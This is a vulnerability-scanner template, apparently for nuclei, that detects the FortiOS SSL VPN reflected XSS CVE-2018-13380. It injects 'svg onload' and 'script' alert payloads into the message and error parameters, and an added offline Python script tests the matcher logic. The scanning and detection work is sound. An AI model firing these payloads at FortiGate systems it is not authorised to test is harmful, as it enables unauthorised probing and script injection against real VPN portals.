id: CVE-2018-13380

info:
  name: Fortinet FortiOS Cross-Site Scripting
  author: shelld3v
  severity: medium
  description: A Cross-site Scripting (XSS) vulnerability in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and below versions under SSL VPN web portal allows attacker to execute unauthorized malicious script code via the error or message handling parameters.
  reference: https://nvd.nist.gov/vuln/detail/CVE-2018-13380
  tags: cve,cve2018,fortios,xss
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.10
    cve-id: CVE-2018-13380
    cwe-id: CWE-79

requests:
  - method: GET
    path:
      - "{{BaseURL}}/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E"
      - "{{BaseURL}}/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E"

    matchers-condition: and
    matchers:
      # Body must reflect one of the injected payloads unencoded. The words
      # are the percent-decoded values of the msg / errmsg parameters above;
      # an empty word here would match every response.
      - type: word
        part: body
        condition: or
        words:
          - "<svg/onload=alert(1337)>"
          - "<script>alert(1337)</script>"

      # A JSON body that echoes the parameter is not rendered as HTML, so
      # it does not prove XSS; reject it.
      - type: word
        part: header
        negative: true
        words:
          - "application/json"

      - type: status
        status:
          - 200
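The following Python is an added example, not part of the nuclei project or of the template above. It re-implements the template's three matchers offline so their interaction can be checked without a target: it decodes the injected parameter from each request path, applies the body / negative header / status checks with AND semantics, and runs them over constructed HTTP responses (the responses are invented for illustration, not captured from a FortiGate).

```python
"""Offline re-implementation of the template's matcher logic (added example)."""
from dataclasses import dataclass, field
from urllib.parse import parse_qs, urlsplit

# Request paths copied from the template, with {{BaseURL}} omitted.
PATHS = [
    "/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E",
    "/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E",
]

# Decoded markers for the body matcher; any one reflected raw is a hit.
PAYLOAD_WORDS = [
    "<svg/onload=alert(1337)>",
    "<script>alert(1337)</script>",
]


@dataclass
class Response:
    """Minimal HTTP response model for the constructed samples below."""
    status: int
    body: str
    headers: dict = field(default_factory=dict)


def injected_values() -> dict:
    """Return {path: decoded value of the injected parameter}.

    parse_qs splits each pair on its first '=', so the '=' inside
    onload=alert(...) is kept, and it percent-decodes the value."""
    out = {}
    for p in PATHS:
        qs = parse_qs(urlsplit(p).query)
        name = "msg" if "msg" in qs else "errmsg"
        out[p] = qs[name][0]
    return out


def content_type(resp: Response) -> str:
    """Case-insensitive Content-Type lookup; header names are not case-sensitive."""
    for name, value in resp.headers.items():
        if name.lower() == "content-type":
            return value.lower()
    return ""


def matches(resp: Response) -> bool:
    """The template's matchers joined by matchers-condition: and.

    1. word, part: body    -- a decoded payload is reflected unencoded
    2. word, part: header  -- negative: JSON responses are not rendered as HTML
    3. status              -- 200"""
    body_hit = any(w in resp.body for w in PAYLOAD_WORDS)
    not_json = "application/json" not in content_type(resp)
    return body_hit and not_json and resp.status == 200


# Constructed responses: one vulnerable reflection plus the three cases the
# matcher set is meant to reject (JSON echo, HTML-encoded echo, non-200).
SAMPLES = {
    "reflected_html": Response(
        200,
        "<!-- err: ABABAB--><script>alert(1337)</script> --><p>Error</p>",
        {"Content-Type": "text/html; charset=utf-8"},
    ),
    "reflected_json": Response(
        200,
        '{"error":"ABABAB--><script>alert(1337)</script>"}',
        {"content-type": "application/json"},
    ),
    "html_encoded": Response(
        200,
        "<p>&lt;script&gt;alert(1337)&lt;/script&gt;</p>",
        {"Content-Type": "text/html"},
    ),
    "not_found": Response(
        404,
        "<script>alert(1337)</script>",
        {"Content-Type": "text/html"},
    ),
}


def run_samples() -> dict:
    """Evaluate every constructed response; only reflected_html should match."""
    return {name: matches(r) for name, r in SAMPLES.items()}


if __name__ == "__main__":
    for path, value in injected_values().items():
        print(f"{path}\n  -> {value}")
    for name, hit in run_samples().items():
        print(f"{name}: {'MATCH' if hit else 'no match'}")
```

The negative header matcher is what keeps a JSON error endpoint that merely echoes `errmsg` from being reported as XSS, and the raw (unencoded) payload words are what reject a patched build that HTML-encodes the parameter before rendering.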